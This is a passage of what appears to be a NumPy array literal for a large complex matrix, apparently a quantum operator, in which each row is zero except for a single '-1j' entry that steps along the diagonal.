0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
